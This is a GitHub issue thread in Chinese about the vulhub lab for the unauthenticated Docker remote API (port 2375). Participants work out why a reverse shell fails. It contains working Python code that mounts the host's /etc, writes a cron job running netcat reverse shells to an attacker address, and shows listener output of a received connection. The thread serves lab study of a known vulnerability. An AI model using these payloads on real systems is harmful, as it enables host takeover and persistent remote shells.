docker/unauthorized-rce 无法执行命令 about vulhub HOT 9 CLOSED

运行容器docker-compose up -d后，在本地用python执行：

import docker

client = docker.DockerClient(base_url='http://your-ip:2375/')
data = client.containers.run('alpine:latest', r'''sh -c "echo '* * * * * /usr/bin/nc 反弹地址 反弹端口 -e /bin/sh' >> /tmp/etc/crontabs/root" ''', remove=True, volumes={'/etc': {'bind': '/tmp/etc', 'mode': 'rw'}})

执行成功。

反弹shell成功：

没有遇到你说的问题。

from vulhub.

看不懂你的描述：

发现无法回弹nc
用 tcp://youip:2375/ ps 发现无容器， 无法执行命令

我们创建的容器是执行写入文件操作后立即删除的，他的目的只是为了修改crontab文件，完成任务后就删除，不会存在能一直看到这个容器的情况。

from vulhub.

我的操作跟p牛你一样 是反弹不回来

from vulhub.

执行docker-compose exec docker sh进入容器内，查看/etc/crontabs/root，看看crontab是否写入成功。

因为是crontab，所以要等待1~2分钟才能收到shell。

排查这些错误，如果还是解决不了，我也没办法了，等待其他人反馈更多信息。

from vulhub.

那个 我好像解决了！ 原因是 容器里面 nc 不支持-e 不知道为啥？
最后使用：
data = client.containers.run('alpine:latest', r'''sh -c "echo '* * * * * /bin/sh | nc 192.168.0.112 9090' >> /tmp/etc/crontabs/root" ''', remove=True, volumes={'/etc': {'bind': '/tmp/etc', 'mode': 'rw'}})

root@ubuntu:/home/xxxxxx/Desktop/vulhub/docker/unauthorized-rce# nc -lvvp 9090
Listening on [0.0.0.0] (family 0, port 9090)
Connection from 172.18.0.2 36961 received!

from vulhub.

不清楚，我的nc是支持的。。。先关闭issue了。

from vulhub.

从 @Tren 的截图可以看到，你使用的是ubuntu系统。ubuntu系统的 nc 属于 OpenBSD 分支：

The OpenBSD one doesn't support -e for executing a command after connection.

这个不属于 vulhub 的问题，该漏洞使用 docker 的 volumes 影响容器外宿主机的 crontab, 所以 payload 要根据宿主机发生变化。

from vulhub.

不能啊，是用的docker in docker，实际弹shell的应该是docker:dind呀。。不解。。

from vulhub.

还真是... 没有看 dockerfile 直接想当然的得结论。
这下丢脸了，师父快帮我关掉 PR.
不过不是这个原因的话是为什么呢... 不懂了...

from vulhub.